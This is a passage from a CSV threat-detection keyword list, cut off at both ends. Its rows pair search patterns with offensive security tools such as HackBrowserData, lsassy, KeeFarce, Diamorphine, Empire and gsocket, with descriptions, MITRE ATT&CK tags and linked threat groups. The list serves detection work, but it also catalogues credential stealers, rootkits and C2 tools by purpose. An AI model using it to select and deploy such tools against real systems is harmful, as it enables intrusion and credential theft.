Evasion","https://github.com/h3xduck/TripleCross","1","1","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","46818" "*h4ntu shell [powered by tsoi]*",".{0,1000}h4ntu\sshell\s\[powered\sby\stsoi\].{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","N/A","php title 
webshell","7","10","2536","403","2025-04-22T10:55:49Z","2020-05-13T11:28:52Z","46819" "*H4sIAAAAAAAEACVQ30vDMBB*",".{0,1000}H4sIAAAAAAAEACVQ30vDMBB.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","46820" "*H4sIAAAAAAAEAIy5BVyTbdQ4PDbYYJSju2N0h5TSndJINyKD0RKKdIOgNIiSChIiYUurgIQoiICAlAJSiojgd9*",".{0,1000}H4sIAAAAAAAEAIy5BVyTbdQ4PDbYYJSju2N0h5TSndJINyKD0RKKdIOgNIiSChIiYUurgIQoiICAlAJSiojgd9.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE 
- Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","#base64","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46821" "*H4sIAAAAAAAEANy9CZwcRfU43tPd093Tc*",".{0,1000}H4sIAAAAAAAEANy9CZwcRfU43tPd093Tc.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","46822" "*H4sIAAAAAAAEANy9e3wTVfo4PG1SmkLbCdpgFdSgUeuCbLTAthYk005gQhNahUIVkCqIqKi1TaAuIGBaJRzG27Kuul5wV3fV1fUuUFxNKbTl3oJAuaiouE4paAGBFpB5n*",".{0,1000}H4sIAAAAAAAEANy9e3wTVfo4PG1SmkLbCdpgFdSgUeuCbLTAthYk005gQhNahUIVkCqIqKi1TaAuIGBaJRzG27Kuul5wV3fV1fUuUFxNKbTl3oJAuaiouE4paAGBFpB5n.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. 
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#base64","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","46823" "*H4sIAAAAAAAEAO06C3Bb1ZVXjp4t23HkOJZx4ji8BDk2UDuOFcD5mEixBM9UpiJxUgYSZEV*",".{0,1000}H4sIAAAAAAAEAO06C3Bb1ZVXjp4t23HkOJZx4ji8BDk2UDuOFcD5mEixBM9UpiJxUgYSZEV.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#base64","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","46824" "*H4sIAAAAAAAEAO1YfXRTR3YfWZItGxkrxE4cwodI5Bg2sS35yZ*",".{0,1000}H4sIAAAAAAAEAO1YfXRTR3YfWZItGxkrxE4cwodI5Bg2sS35yZ.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. 
What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#base64","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","46825" "*H4sIAAAAAAAEAOx9CVhTR9fw3CQkYScgqyAILsgm*",".{0,1000}H4sIAAAAAAAEAOx9CVhTR9fw3CQkYScgqyAILsgm.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","46826" "*h8mail -*",".{0,1000}h8mail\s\-.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Reconnaissance","https://github.com/opencubicles/h8mail","1","0","N/A","N/A","N/A","1","11","4","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z","46827" "*h8mail -t *@*.*",".{0,1000}h8mail\s\-t\s.{0,1000}\@.{0,1000}\..{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46828" "*h8mail*",".{0,1000}h8mail.{0,1000}","offensive_tool_keyword","h8mail","h8mail is an email OSINT and breach hunting tool using different breach and reconnaissance services. or local breaches such as Troy Hunts Collection1 and the infamous Breach Compilation torrent","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Reconnaissance","https://github.com/khast3x/h8mail","1","0","N/A","N/A","N/A","10","4408","539","2023-08-15T10:50:34Z","2018-06-15T02:47:00Z","46829" "*Ha3MrX/Gemail-Hack*",".{0,1000}Ha3MrX\/Gemail\-Hack.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/Ha3MrX/Gemail-Hack","1","1","N/A","N/A","7","10","1062","400","2024-01-17T15:12:44Z","2018-04-19T13:48:41Z","46830" "*haad/proxychains*",".{0,1000}haad\/proxychains.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027 - T1573 - T1095","TA0005 - TA0011 - TA0010","N/A","Vice Society - Qilin - Black Basta - Dispossessor - EMBER BEAR","Defense Evasion","https://github.com/haad/proxychains","1","1","N/A","N/A","8","10","7142","647","2024-06-08T02:20:54Z","2011-02-25T12:27:05Z","46831" "*hackbrowersdata.cna*",".{0,1000}hackbrowersdata\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","N/A","10","10","175","25","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z","46832" "*hack-browser-data.exe*",".{0,1000}hack\-browser\-data\.exe.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tool","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","46833" "*hack-browser-data/*",".{0,1000}hack\-browser\-data\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","N/A","10","10","96","17","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z","46834" "*hackbuildrepeat/SharpView*",".{0,1000}hackbuildrepeat\/SharpView.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","46835" 
"*Hackcraft-Labs/ScheduleRunner*",".{0,1000}Hackcraft\-Labs\/ScheduleRunner.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","46836" "*Hackcraft-Labs/SharpShares*",".{0,1000}Hackcraft\-Labs\/SharpShares.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","46837" "*Hacked by Skenda Unikkatil*",".{0,1000}Hacked\sby\sSkenda\sUnikkatil.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","N/A","10","1","37","28","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z","46838" "*hacked_getdents64(*",".{0,1000}hacked_getdents64\(.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","46839" "*hacked_kill(*",".{0,1000}hacked_kill\(.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","46840" 
"*HACKER*FUCKER*Xeroxxx*",".{0,1000}HACKER.{0,1000}FUCKER.{0,1000}Xeroxxx.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","46841" "*hackerhouse-opensource/OffensiveLua*",".{0,1000}hackerhouse\-opensource\/OffensiveLua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","46842" "*hackerhouse-opensource/SignToolEx*",".{0,1000}hackerhouse\-opensource\/SignToolEx.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002 - T1649","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","N/A","8","3","275","47","2024-07-19T17:22:28Z","2023-12-29T14:26:45Z","46843" "*hackerschoice/gsocket*",".{0,1000}hackerschoice\/gsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket 
Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46844" "*hackerschoice/gsocket-relay*",".{0,1000}hackerschoice\/gsocket\-relay.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","46845" "*hackerschoice/hackshell*",".{0,1000}hackerschoice\/hackshell.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","46846" "*hackertarget-get-rootdomains *",".{0,1000}hackertarget\-get\-rootdomains\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","46847" "*hackingtool.py*",".{0,1000}hackingtool\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","46849" 
"*Hackndo/conpass*",".{0,1000}Hackndo\/conpass.{0,1000}","offensive_tool_keyword","conpass","Continuous password spraying tool","T1110.001 - T1110 - T1078.001 - T1201","TA0006 - TA0007 - TA0005","N/A","N/A","Credential Access","https://github.com/login-securite/conpass","1","1","N/A","N/A","10","2","181","17","2025-03-03T15:05:25Z","2022-12-15T18:03:42Z","46850" "*Hackndo/sprayhound*",".{0,1000}Hackndo\/sprayhound.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46851" "*Hackndo/sprayhound*",".{0,1000}Hackndo\/sprayhound.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","N/A","3","231","19","2024-12-31T08:09:37Z","2020-02-06T17:45:37Z","46852" "*hackndo@gmail.com*",".{0,1000}hackndo\@gmail\.com.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#email","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","46853" "*Hackplayers/evil-winrm*",".{0,1000}Hackplayers\/evil\-winrm.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46854" "*hackrf_sweep -f *",".{0,1000}hackrf_sweep\s\-f\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46855" "*hackshell-main.zip*",".{0,1000}hackshell\-main\.zip.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","46856" "*hacksysteam/CVE-2023-*",".{0,1000}hacksysteam\/CVE\-2023\-.{0,1000}","offensive_tool_keyword","POC","Adobe Acrobat Reader - CVE-2023-21608 - Remote Code Execution Exploit ","T1203 - T1218 - T1059 - T1064 - T1204","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","N/A","3","272","58","2023-12-05T12:21:02Z","2023-01-30T12:57:48Z","46857" "*HackTheWorld*",".{0,1000}HackTheWorld.{0,1000}","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far.","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","0","N/A","N/A","N/A","10","977","169","2024-01-19T12:11:39Z","2018-02-17T11:46:40Z","46858" "*HackTool.MSIL.KeeFarce*",".{0,1000}HackTool\.MSIL\.KeeFarce.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database 
directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#Avsignature","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","46879" "*HackTool:Win32/KeeFarce*",".{0,1000}HackTool\:Win32\/KeeFarce.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#Avsignature","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","46952" "*HackTool:Win32/PWDump*",".{0,1000}HackTool\:Win32\/PWDump.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","#Avsignature","N/A","10","10","N/A","N/A","N/A","N/A","46958" "*HackTool:Win32/PWDump*",".{0,1000}HackTool\:Win32\/PWDump.{0,1000}","offensive_tool_keyword","ADPassHunt","credential stealer tool that hunts Active Directory credentials (leaked tool Developed In-house for Fireeyes Red Team)","T1003.003 - T1552.006","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.virustotal.com/gui/file/73233ca7230fb5848e220723caa06d795a14c0f1f42c6a59482e812bfb8c217f","1","0","#Avsignature","N/A","10","10","N/A","N/A","N/A","N/A","46959" "*hacktools-*.xpi*",".{0,1000}hacktools\-.{0,1000}\.xpi.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/LasCC/Hack-Tools","1","1","N/A","N/A","9","10","6045","678","2025-01-05T23:10:49Z","2020-06-22T21:42:16Z","46968" 
"*hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi*",".{0,1000}hack\-tools\/cmbndhnoonmghfofefkcccljbkdpamhi.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/LasCC/Hack-Tools","1","1","N/A","N/A","9","10","6045","678","2025-01-05T23:10:49Z","2020-06-22T21:42:16Z","46969" "*Hack-Tools-master*",".{0,1000}Hack\-Tools\-master.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/LasCC/Hack-Tools","1","1","N/A","N/A","9","10","6045","678","2025-01-05T23:10:49Z","2020-06-22T21:42:16Z","46970" "*hades_directsys.exe*",".{0,1000}hades_directsys\.exe.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","1","N/A","N/A","7","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","46971" "*HadesLdr-main*",".{0,1000}HadesLdr\-main.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","46972" "*Hagrid29/DumpAADSyncCreds*",".{0,1000}Hagrid29\/DumpAADSyncCreds.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - 
